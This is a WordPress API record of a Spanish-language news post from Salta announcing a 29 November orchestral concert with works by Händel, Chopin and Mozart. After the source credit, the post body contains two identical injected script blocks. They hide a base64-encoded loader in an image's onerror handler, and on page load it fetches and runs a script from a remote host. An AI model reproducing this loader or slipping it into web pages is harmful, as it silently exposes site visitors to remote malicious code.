{"id":4630,"date":"2024-11-26T19:03:25","date_gmt":"2024-11-26T22:03:25","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4630"},"modified":"2025-08-13T23:44:37","modified_gmt":"2025-08-14T02:44:37","slug":"la-orquesta-sinfonica-y-el-mozarteum-argentino-presentan-una-noche-de-musica-clasica","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4630","title":{"rendered":"La Orquesta Sinf\u00f3nica y el Mozarteum Argentino presentan una noche de m\u00fasica cl\u00e1sica"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-efc5daa258adc5ae44a5df7e725b9791\" style=\"background-color:#561122\"><em>El 29 de noviembre, el cuerpo mayor de m\u00fasica de la Provincia ofrecer\u00e1 un concierto imperdible con obras seleccionadas de H\u00e4ndel, Chopin y Mozart, bajo la direcci\u00f3n de Jorge Mario Uribe.<\/em><\/h4>\n\n\n\n<p>El Mozarteum Argentino, filial Salta, y la Orquesta Sinf\u00f3nica llevar\u00e1n adelante un concierto el pr\u00f3ximo viernes 29 de noviembre a las 21, en la Sala Juan Carlos D\u00e1valos de la Casa de la Cultura, en Caseros 460.&nbsp;<\/p>\n\n\n\n<p>El programa contar\u00e1 con tres obras emblem\u00e1ticas del repertorio cl\u00e1sico: \u201cM\u00fasica para los Reales\u201d, \u201cFuegos de Artificio\u201d de Georg Friedrich H\u00e4ndel, \u201cEl Concierto Para Piano N\u00b0 2\u201d de Fr\u00e9d\u00e9rich Chopin, y la \u201cSinfon\u00eda N\u00b0 40\u201d de Wolfgang Amadeus Mozart.<br>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/14982-la-orquesta-sinfonica-y-el-mozarteum-argentino-presentan-una-noche-de-musica-clasica.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/14982-la-orquesta-sinfonica-y-el-mozarteum-argentino-presentan-una-noche-de-musica-clasica.webp\" alt=\"La Orquesta Sinf\u00f3nica y el Mozarteum Argentino presentan una noche de m\u00fasica cl\u00e1sica\" style=\"width:295px;height:auto\"\/><\/a><\/figure><\/div>\n\n\n<p>En esta ocasi\u00f3n, el pianista Hugo Schuler se presentar\u00e1 como solista, interpretando la obra de Chopin. En tanto, el director titular de la orquesta, Jorge Mario Uribe, estar\u00e1 al frente de la interpretaci\u00f3n de estas tres piezas que prometen cautivar a los asistentes.<\/p>\n\n\n\n<p>Las entradas est\u00e1n disponibles en&nbsp;<a href=\"https:\/\/www.saltaticket.gob.ar\/\">https:\/\/www.saltaticket.gob.ar<\/a>&nbsp;y en la boleter\u00eda de la Casa de la Cultura, Caseros 460. &nbsp;<br>&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El 29 de noviembre, el cuerpo mayor de m\u00fasica de la Provincia ofrecer\u00e1 un concierto imperdible con obras seleccionadas de H\u00e4ndel, Chopin y Mozart, bajo la direcci\u00f3n de Jorge Mario Uribe. El Mozarteum Argentino, filial Salta, y la Orquesta Sinf\u00f3nica llevar\u00e1n adelante un concierto el pr\u00f3ximo viernes 29 de noviembre a las 21, en la [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4631,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[13,15],"tags":[],"class_list":{"0":"post-4630","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-festivales","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4630"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4630"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4630\/revisions"}],"predecessor-version":[{"id":6626,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4630\/revisions\/6626"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4631"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4630"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4630"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4630"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}